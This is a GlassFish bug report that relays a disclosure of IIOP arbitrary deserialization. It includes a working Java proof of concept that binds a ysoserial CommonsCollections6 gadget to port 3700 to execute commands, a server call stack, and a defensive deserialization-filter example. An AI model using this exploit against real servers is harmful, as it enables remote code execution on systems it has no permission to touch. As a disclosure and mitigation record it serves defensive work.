Bug 562345 - glassfish arbitrary deserialization
Summary: glassfish arbitrary deserialization
Status: NEW
Alias: None
Product: z_Archived
Classification: Eclipse Foundation
Component: Glassfish
Version: unspecified
Hardware: PC Linux
Importance: P3 normal
Target Milestone: ---
Assignee: Project Inbox
QA Contact:
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:

Reported: 2020-04-20 15:04 EDT by Eclipse Webmaster
Modified: 2022-06-01 15:58 EDT
See Also:
Description (Eclipse Webmaster, 2020-04-20 15:04:41 EDT)
From the security mailing list:

0x00 Brief introduction
The IIOP protocol can arbitrarily deserialize. I and r00t4dm from A-TEAM of Legendsec at Qi'anxin Group finished the research.


0x01 Attack
Version: glassfish-5.1.0

We use commons-collections-3.1.jar as an example. We put commons-collections-3.1.jar into glassfish5\glassfish\lib. Then we use the following code to attack. It pops up the calculator on Windows.

Here you need to download the ysoserial library; it will help us construct malicious objects.

PoC
```java
import ysoserial.payloads.*;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.util.Hashtable;

public class iiopEXP {

    public static void main(String[] args) throws Exception {
        Hashtable env = new Hashtable();
        // use GlassFish's com.sun.enterprise.naming.impl.SerialInitContextFactory
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.enterprise.naming.impl.SerialInitContextFactory");
        // the IIOP naming endpoint of the local GlassFish instance
        env.put(Context.PROVIDER_URL, "iiop://127.0.0.1:3700");
        Context ctx = new InitialContext(env);

        // gadget chain built by ysoserial (CommonsCollections6)
        CommonsCollections6 cc6 = new CommonsCollections6();
        // bind the gadget object; the server deserializes it on receipt
        ctx.bind("iswin", cc6.getObject("calc"));
    }
}
```



Call stack
```
<init>:215, ProcessBuilder (java.lang)
exec:617, Runtime (java.lang)
exec:450, Runtime (java.lang)
exec:347, Runtime (java.lang)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
transform:125, InvokerTransformer (org.apache.commons.collections.functors)
transform:122, ChainedTransformer (org.apache.commons.collections.functors)
get:151, LazyMap (org.apache.commons.collections.map)
getValue:73, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:120, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
readObject:342, HashSet (java.util)
invokeVirtual_LL_V:-1, 2014582044 (java.lang.invoke.LambdaForm$DMH)
reinvoke:-1, 1938060362 (java.lang.invoke.LambdaForm$BMH)
invoke_MT:-1, 972344001 (java.lang.invoke.LambdaForm$MH)
invokeObjectReader:1727, IIOPInputStream (com.sun.corba.ee.impl.io)
inputObject:1109, IIOPInputStream (com.sun.corba.ee.impl.io)
simpleReadObject:313, IIOPInputStream (com.sun.corba.ee.impl.io)
readValueInternal:274, ValueHandlerImpl (com.sun.corba.ee.impl.io)
readValue:240, ValueHandlerImpl (com.sun.corba.ee.impl.io)
readRMIIIOPValueType:781, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_value:883, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_value:701, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_value:482, CDRInputObject (com.sun.corba.ee.impl.encoding)
unmarshalIn:252, TCUtility (com.sun.corba.ee.impl.corba)
read_value:571, AnyImpl (com.sun.corba.ee.impl.corba)
read_any:541, CDRInputStream_1_0 (com.sun.corba.ee.impl.encoding)
read_any:439, CDRInputObject (com.sun.corba.ee.impl.encoding)
readAny:372, Util (com.sun.corba.ee.impl.javax.rmi.CORBA)
read:268, DynamicMethodMarshallerImpl$10 (com.sun.corba.ee.impl.presentation.rmi)
readArguments:420, DynamicMethodMarshallerImpl (com.sun.corba.ee.impl.presentation.rmi)
_invoke:141, ReflectiveTie (com.sun.corba.ee.impl.presentation.rmi)
dispatchToServant:490, ServerRequestDispatcherImpl (com.sun.corba.ee.impl.protocol)
dispatch:161, ServerRequestDispatcherImpl (com.sun.corba.ee.impl.protocol)
handleRequestRequest:1520, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
handleRequest:1396, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
handleInput:901, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
callback:183, RequestMessage_1_2 (com.sun.corba.ee.impl.protocol.giopmsgheaders)
handleRequest:665, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
dispatch:467, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
doWork:2193, MessageMediatorImpl (com.sun.corba.ee.impl.protocol)
performWork:467, ThreadPoolImpl$WorkerThread (com.sun.corba.ee.impl.threadpool)
run:510, ThreadPoolImpl$WorkerThread (com.sun.corba.ee.impl.threadpool)
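The call stack above ends in `HashSet.readObject` driving `TiedMapEntry`, `LazyMap` and `InvokerTransformer` from `org.apache.commons.collections`. The defender-side counterpart is to refuse such classes before they are instantiated. The following is an added example, not code from the report, from GlassFish or from ysoserial: a Java 9+ `java.io.ObjectInputFilter` (the JEP 290 mechanism, also available on Java 8u121+ as `sun.misc.ObjectInputFilter`) that rejects the `org.apache.commons.collections.` packages seen in the stack, caps object-graph depth, and otherwise allows only the `java.util`/`java.lang` types a service expects. Whether the ORB's `IIOPInputStream` path honours the JDK filter is not established by the report, so applying this to a GlassFish IIOP listener is something to verify rather than assume; the class names `DeserializationFilterDemo` and `Untrusted` and the depth limit of 10 are choices made for this illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashSet;
import java.util.Set;

public class DeserializationFilterDemo {

    // Constructed stand-in for a class the endpoint never expects to receive.
    // It is not a gadget; it only has to fall outside the allowlist.
    static class Untrusted implements Serializable {
        private static final long serialVersionUID = 1L;
        String payload = "anything";
    }

    /** Filter = explicit deny for the gadget packages from the call stack,
     *  a depth cap, then a strict allowlist of the types this endpoint expects. */
    static ObjectInputFilter buildFilter() {
        ObjectInputFilter denyGadgets = info -> {
            Class<?> c = info.serialClass();
            if (c != null && c.getName().startsWith("org.apache.commons.collections.")) {
                return ObjectInputFilter.Status.REJECTED;
            }
            // The CC6 chain nests HashSet -> TiedMapEntry -> LazyMap -> transformers;
            // a legitimate payload for this endpoint never needs a graph this deep.
            if (info.depth() > 10) {
                return ObjectInputFilter.Status.REJECTED;
            }
            return ObjectInputFilter.Status.UNDECIDED;
        };
        // JDK pattern syntax: allow java.util.* and java.lang.*, reject everything else.
        ObjectInputFilter allowlist =
                ObjectInputFilter.Config.createFilter("java.util.*;java.lang.*;!*");
        return info -> {
            ObjectInputFilter.Status s = denyGadgets.checkInput(info);
            return s == ObjectInputFilter.Status.REJECTED ? s : allowlist.checkInput(info);
        };
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Deserializes under the filter; a rejected class surfaces as InvalidClassException
     *  while the class descriptor is read, before any instance of it is created. */
    static Object deserialize(byte[] bytes, ObjectInputFilter filter)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(filter);
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        ObjectInputFilter filter = buildFilter();

        // A plain HashSet of strings is what the allowlist permits.
        Set<String> expected = new HashSet<>(Set.of("iswin"));
        System.out.println("allowed:  " + deserialize(serialize(expected), filter));

        // Anything outside java.util/java.lang is refused before instantiation.
        try {
            deserialize(serialize(new Untrusted()), filter);
            System.out.println("BUG: Untrusted was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same allow/deny pattern can be installed process-wide with the `jdk.serialFilter` system property instead of per stream, which is the practical route for a container whose deserialization entry points you do not control. A filter of this kind limits the blast radius of an exposed endpoint; it does not replace removing the gadget-bearing jar from the server's `lib` directory or keeping the IIOP listener (port 3700 in the PoC) off untrusted networks.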